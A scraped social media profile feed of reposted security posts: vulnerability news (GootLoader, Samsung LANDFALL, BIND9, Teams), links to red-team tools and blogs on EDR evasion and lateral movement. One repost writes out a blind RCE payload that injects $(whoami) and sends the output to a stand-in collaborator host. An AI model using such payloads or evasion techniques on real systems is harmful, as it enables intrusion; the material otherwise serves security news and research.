kubergeek's profile picture.

kübergeek

@kubergeek

kübergeek reposted

After a two-month break, I’m back with a new article on signup/ registration bugs testing. I covered every practical method you can use to uncover issues in signup and registration flows. Check it out. infosecwriteups.com/a-comprehensiv…


kübergeek reposted

Buffer over-read in Windows TDX.sys allows an authorized attacker to elevate privileges locally github.com/advisories/GHS…


kübergeek reposted

☠️Blind Remote Code Execution🔥 ✅POC: curl -X POST -d \"user=$(whoami)\" http://BURP_LINK" Join my BugBounty Telegram Channel: t.me/ShellSec some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the…


kübergeek reposted

🚨 GootLoader is back — and smarter. Huntress found 3 new cases since Oct 27. In 2 of them, attackers took full control in under 17 hours. Now it hides fake PDFs using special web fonts so the files look safe. ZIPs fool scanners but open real malware on Windows. Details ↓…

TheHackersNews's tweet image. 🚨 GootLoader is back — and smarter.

Huntress found 3 new cases since Oct 27. In 2 of them, attackers took full control in under 17 hours.

Now it hides fake PDFs using special web fonts so the files look safe. ZIPs fool scanners but open real malware on Windows.

Details ↓…

kübergeek reposted

The "Trusting Trust" attack is defeatable, see David A. Wheeler's PhD thesis: dwheeler.com/trusting-trust.


kübergeek reposted

A single image file could hijack Galaxy phones. Attackers hid a ZIP inside DNG photos sent over WhatsApp, exploiting a zero-day in Samsung’s image codec (CVE-2025-21042). The implant — called LANDFALL — gave full spyware access. Full report → thehackernews.com/2025/11/samsun…


kübergeek reposted

🚨 Researchers just found 4 serious flaws in Microsoft Teams that let attackers fake messages and impersonate coworkers — no “Edited” label, no warning. If your team uses Teams, read this now ↓ thehackernews.com/2025/11/micros…


kübergeek reposted

ADCSDevilCOM 📍 A C# tool for requesting certificates from ADCS using DCOM over SMB. This tool allows you to remotely request X.509 certificates from CA server using the MS-WCCE protocol over DCOM and It bypasses the traditional endpoint mapper requirement by using SMB…


kübergeek reposted

I am happy to present the latest blogpost I was working on. It is about enumerating and attacking MSSQL databases from both external and internal perspective. Hope you learn something from it and as always, any feedback is welcomed! r-tec.net/r-tec-blog-mss…


kübergeek reposted

MCP servers are now a recognized attack surface. Last 72 hours:   - CVE-2025-11202 (Found be me 😀 through @thezdi): win-cli-mcp-server command injection RCE (CVSS 9.8)   - CVE-2025-64132: Jenkins MCP Server permission bypass The Model Context Protocol is 3 months old and already…


kübergeek reposted

🚨 Critical BIND9 flaw puts 5,900+ DNS servers at risk. CVE-2025-40778 (CVSS 8.6) lets attackers poison resolver caches and redirect traffic to fake sites. A public PoC is out—patch now and lock recursion to trusted clients. Full details ↓ thehackernews.com/2025/10/threat… #ThreatsDay

TheHackersNews's tweet image. 🚨 Critical BIND9 flaw puts 5,900+ DNS servers at risk.
CVE-2025-40778 (CVSS 8.6) lets attackers poison resolver caches and redirect traffic to fake sites.

A public PoC is out—patch now and lock recursion to trusted clients.

Full details ↓ thehackernews.com/2025/10/threat…

#ThreatsDay

kübergeek reposted

THERE'S A WEB APP TESTING SKILL IN THEIR GITHUB REPO!!!! 😍😍😍 github.com/anthropics/ski…

Today we're introducing Skills in claude dot ai, Claude Code, and the API. Skills let you package specialized knowledge into reusable capabilities that Claude loads on demand as agents tackle more complex tasks. Here's how they work and why they matter for the future of agents:

alexalbert__'s tweet image. Today we're introducing Skills in claude dot ai, Claude Code, and the API.

Skills let you package specialized knowledge into reusable capabilities that Claude loads on demand as agents tackle more complex tasks.

Here's how they work and why they matter for the future of agents:


kübergeek reposted

From Chaos to Clarity. Turning Raw Windows Logs into Executive Insights. Looking for Indicators of Compromise. github.com/Logisek/Threat…


kübergeek reposted

📖Fantastic weekend read: Code auditing 101 Blog: blog.rodolpheg.xyz/posts/code-aud… author: Rodolphe Ghio

mqst_'s tweet image. 📖Fantastic weekend read: Code auditing 101

Blog: blog.rodolpheg.xyz/posts/code-aud…

author: Rodolphe Ghio
mqst_'s tweet image. 📖Fantastic weekend read: Code auditing 101

Blog: blog.rodolpheg.xyz/posts/code-aud…

author: Rodolphe Ghio
mqst_'s tweet image. 📖Fantastic weekend read: Code auditing 101

Blog: blog.rodolpheg.xyz/posts/code-aud…

author: Rodolphe Ghio

kübergeek reposted

No big surprises here. virustotal.com/gui/file/1b577… @SecurityAura: One more worldwide compromised device 🤔 IYKYK

BertJanCyber's tweet image. No big surprises here. 
virustotal.com/gui/file/1b577…

@SecurityAura: One more worldwide compromised device 🤔 IYKYK

This was not good enough, my productivity still took a hit. Now EDR has been configured without any automated response. Starting to look good.

BertJanCyber's tweet image. This was not good enough, my productivity still took a hit. Now EDR has been configured without any automated response. Starting to look good.


kübergeek reposted

Lateral movement getting blocked by traditional methods? @werdhaihai just dropped research on a new lateral movement technique using Windows Installer Custom Action Server, complete with working BOF code. ghst.ly/4pN03PG


kübergeek reposted

🛠️ Wyrm - A red team post exploitation framework for testing security controls during red team assessments. github.com/0xflux/wyrm


kübergeek reposted

Did you know? You can estimate the size of an UAF object from the crash log. Just count the purple bytes in the addressed sequence, and multiply by 8

zerodaytraining's tweet image. Did you know? You can estimate the size of an UAF object from the crash log. Just count the purple bytes in the addressed sequence, and multiply by 8

kübergeek reposted

Hey all, here's my latest blog post: g3tsyst3m.com/fileless%20tec… We'll get to have some fun coding a custom PE loader that downloads and executes our PE in-memory. We'll also take a stab at sneaking past Defender XDR and Sophos XDR. 😸


Loading...

Something went wrong.


Something went wrong.